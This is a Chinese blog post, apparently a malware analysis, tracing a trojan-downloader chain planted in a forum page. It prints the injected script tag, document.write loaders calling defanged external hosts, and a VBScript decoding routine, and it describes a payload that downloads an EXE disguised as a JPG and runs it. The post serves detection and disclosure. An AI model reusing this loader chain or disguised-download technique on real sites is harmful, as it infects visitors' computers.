某论坛上挂的东东,JPG图片 or 病毒Trojan.Win32.VB.azc?

简介: 某论坛上挂的东东,JPG图片 or 病毒Trojan.Win32.VB.azc?

前几天,打开某论坛时,Kaspersky报告:已检测 木马程序 Trojan-Downloader.HTML.Agent.df

检查网页发现首部被植入代码:

/---
<script language="javascript" src="hxxp://61.146.118.1*1/news***/include/md5.asp?ad=1"></script>
---/

hxxp://61.146.118.1*1/news***/include/md5.asp?ad=1 的内容为:

/---
document.write("<script language=/"javascript/" src=/"");
document.write("hxxp://www.ha**v**eip.com/d**a.asp/">");
document.write("</script>");
---/

hxxp://www.ha**v**eip.com/d**a.asp 包含代码:

/---
var ad_str="<script language=/"javascript/" src=/"hxxp://www.blogchina.com/resource/upload***/pic***/2006/05/05/wpt**8.js/"><//script>"
SetCookie("my_ad","yes",3600,"/");document.write(ad_str);}
//-->

hxxp://www.blogchina.com/resource/upload***/pic***/2006/05/05/wpt**8.js 包含JavaScript脚本代码,功能是输出VBScript脚本代码。

输出的VBScript脚本代码的功能是使用自定义解密函数

/---
function r(k)
s=Split(k,"@")
t=""
For i_ = 0 To UBound(s)
t=t+Chr(eval(s(i_)))
Next
r=t
End Function
---/

解密并输出变量t的值。

解密后的变量t的值为 VBScript脚本,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件wpt8.vbe,保存为 IE临时文件夹下的webpnt.vbe,然后通过 Shell.Application 对象 Q 的 ShellExecute 方法 来运行。

wpt8.vbe 的内容为VBScript脚本,功能是是使用自定义解密函数

/---
function r(k)
s=Split(k,"@")
t=""
For i_ = 0 To UBound(s)
t=t+Chr(eval(s(i_)))
Next
r=t
End Function
---/

解密并执行变量t的值。

解密后的变量t的值为VBScript脚本,功能是利用 Microsoft.XMLHTTP、ADODB.Stream 和 scrīpting.FileSystemObject 下载文件hxxp://11***8.img**.pp**.sohu.com/images/2007/5/11/1***0/24/11***31**1048215.jpg,保存为 IE临时文件夹下的 webpnt.exe,然后通过 Shell.Run 来运行。


相关文章
|
2月前
|
安全 数据安全/隐私保护
某论坛挂马Worm.Win32.Autorun.eyh
某论坛挂马Worm.Win32.Autorun.eyh
|
2月前
|
安全 网络协议
刘三姐故乡的某网站被植入下载Worm.Win32.Delf.bse, Worm.Win32.Viking.ls等的代码
刘三姐故乡的某网站被植入下载Worm.Win32.Delf.bse, Worm.Win32.Viking.ls等的代码
|
2月前
|
JavaScript 前端开发 数据安全/隐私保护
小心QQ信息中的网址传播维金Worm.Win32.Viking.ix/Worm.Viking.pg
小心QQ信息中的网址传播维金Worm.Win32.Viking.ix/Worm.Viking.pg
01-15/某师范学院网站被挂马 sinze.exe/Virus.Win32.Delf.an
01-15/某师范学院网站被挂马 sinze.exe/Virus.Win32.Delf.an
|
2月前
|
安全
利用迅雷和MS06014漏洞传播Worm.Win32.Agent.a的电子书网站
利用迅雷和MS06014漏洞传播Worm.Win32.Agent.a的电子书网站
|
2月前
|
安全 数据安全/隐私保护
01-12/某县政府网被加入下载木马 Trojan.Win32.Pakes 的代码(第2版)
01-12/某县政府网被加入下载木马 Trojan.Win32.Pakes 的代码(第2版)
|
2月前
|
安全 Windows
【原创】借助瑞星在线查毒解决Trojan.DL.GPigeon.a和Exploit.HTML.Mht
【原创】借助瑞星在线查毒解决Trojan.DL.GPigeon.a和Exploit.HTML.Mht
|
2月前
|
缓存 算法 网络协议
文学论坛挂的马换 成 Worm.Win32.Agent.imh 了
文学论坛挂的马换 成 Worm.Win32.Agent.imh 了
|
2月前
|
安全
某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel
某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel
|
2月前
|
安全
某P2P视频软件论坛被挂马Trojan.DL.Win32.Mnless.rq
某P2P视频软件论坛被挂马Trojan.DL.Win32.Mnless.rq